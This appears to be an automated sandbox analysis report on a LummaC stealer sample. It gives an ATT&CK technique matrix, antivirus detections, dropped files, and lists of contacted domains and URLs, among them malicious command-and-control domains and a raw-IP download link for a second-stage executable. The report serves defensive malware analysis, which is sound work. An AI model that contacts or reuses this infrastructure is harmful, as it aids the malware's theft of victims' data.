Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_02491B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_02491B33
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_02490E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_02490E5D

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 DLL Side-Loading	11 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Query Registry	Remote Desktop Protocol	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	131 Security Software Discovery	SMB/Windows Admin Shares	3 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	1 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	4 Obfuscated Files or Information	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	22 Software Packing	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	24 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
wN8pQhRNnu.exe	55%	ReversingLabs	Win32.Exploit.LummaC
wN8pQhRNnu.exe	50%	Virustotal		Browse
wN8pQhRNnu.exe	100%	Avira	HEUR/AGEN.1312567
wN8pQhRNnu.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	100%	Avira	HEUR/AGEN.1312567
C:\Users\user\AppData\Local\Temp\5759.tmp.exe	100%	Avira	HEUR/AGEN.1312567
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\5759.tmp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	62%	ReversingLabs	Win32.Trojan.LummaC
C:\Users\user\AppData\Local\Temp\5759.tmp.exe	62%	ReversingLabs	Win32.Trojan.LummaC

Source	Detection	Scanner	Label
https://wrathful-jammy.cyou/apiB	100%	Avira URL Cloud	malware
https://deafeninggeh.biz:443/apipp	100%	Avira URL Cloud	malware
https://wrathful-jammy.cyou/2	100%	Avira URL Cloud	malware
https://deafeninggeh.biz/apib	100%	Avira URL Cloud	malware
https://community.fastly.steams	0%	Avira URL Cloud	safe
https://debonairnukk.xyz/apieg	100%	Avira URL Cloud	malware
https://awake-weaves.cyou/apio	100%	Avira URL Cloud	malware
https://deafeninggeh.biz/apiyis	100%	Avira URL Cloud	malware
http://176.113.115.19/_	0%	Avira URL Cloud	safe
https://deafeninggeh.biz/L_	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
post-to-me.com	172.67.179.207	true	false	high
steamcommunity.com	23.55.153.106	true	false	high
immureprech.biz	104.21.22.222	true	false	high
deafeninggeh.biz	104.21.16.1	true	false	high
sordid-snaked.cyou	unknown	unknown	false	high
diffuculttan.xyz	unknown	unknown	false	high
effecterectz.xyz	unknown	unknown	false	high
awake-weaves.cyou	unknown	unknown	false	high
wrathful-jammy.cyou	unknown	unknown	false	high
debonairnukk.xyz	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
sordid-snaked.cyou	false	high
deafeninggeh.biz	false	high
effecterectz.xyz	false	high
wrathful-jammy.cyou	false	high
https://steamcommunity.com/profiles/76561199724331900	false	high
awake-weaves.cyou	false	high
immureprech.biz	false	high
https://immureprech.biz/api	false	high
debonairnukk.xyz	false	high
diffuculttan.xyz	false	high
https://post-to-me.com/track_prt.php?sub=0&cc=DE	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://wrathful-jammy.cyou/apiB	5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://player.vimeo.com	5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://immureprech.biz/	5759.tmp.exe, 00000001.00000003.1861891488.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124600020.0000000000A7F000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/?subsection=broadcasts	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/subscriber_agreement/	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.gstatic.cn/recaptcha/	5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://deafeninggeh.biz/	5759.tmp.exe, 00000001.00000003.1861891488.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wrathful-jammy.cyou/api	5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exe	wN8pQhRNnu.exe, 00000000.00000003.4008558725.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, wN8pQhRNnu.exe, 00000000.00000003.4008529922.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.valvesoftware.com/legal.htm	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124600020.0000000000A7F000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/=0&c	5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com	5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A02000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/	5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl	5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124600020.0000000000A7F000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A02000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://deafeninggeh.biz/apib	5759.tmp.exe, 00000001.00000003.1861891488.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1861926485.0000000000A42000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://s.ytimg.com;	5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124450626.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124600020.0000000000A7F000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/	5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steam.tv/	5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://post-to-me.com/track_prt.php?sub=&cc=DE	wN8pQhRNnu.exe, 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=e	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A02000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://deafeninggeh.biz:443/apipp	5759.tmp.exe, 00000001.00000003.1861780712.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://store.steampowered.com/privacy_agreement/	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124450626.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/points/shop/	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sketchfab.com	5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lv.queniujq.cn	5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199724331900/inventory/	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124450626.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com/	5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/privacy_agreement/	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124600020.0000000000A7F000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://post-to-me.com/track_prt.php?sub=	wN8pQhRNnu.exe	false		high
https://wrathful-jammy.cyou/2	5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/recaptcha/	5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://checkout.steampowered.com/	5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://post-to-me.com/	wN8pQhRNnu.exe, 00000000.00000002.4130595002.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, wN8pQhRNnu.exe, 00000000.00000003.4008558725.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/;	5759.tmp.exe, 00000001.00000002.2124616833.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/about/	5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/my/wishlist/	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124600020.0000000000A7F000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steams	5759.tmp.exe, 00000001.00000002.2124616833.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://help.steampowered.com/en/	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/market/	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/news/	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/fJ	5759.tmp.exe, 00000001.00000002.2124499650.0000000000A07000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A07000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/subscriber_agreement/	5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124450626.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	false		high
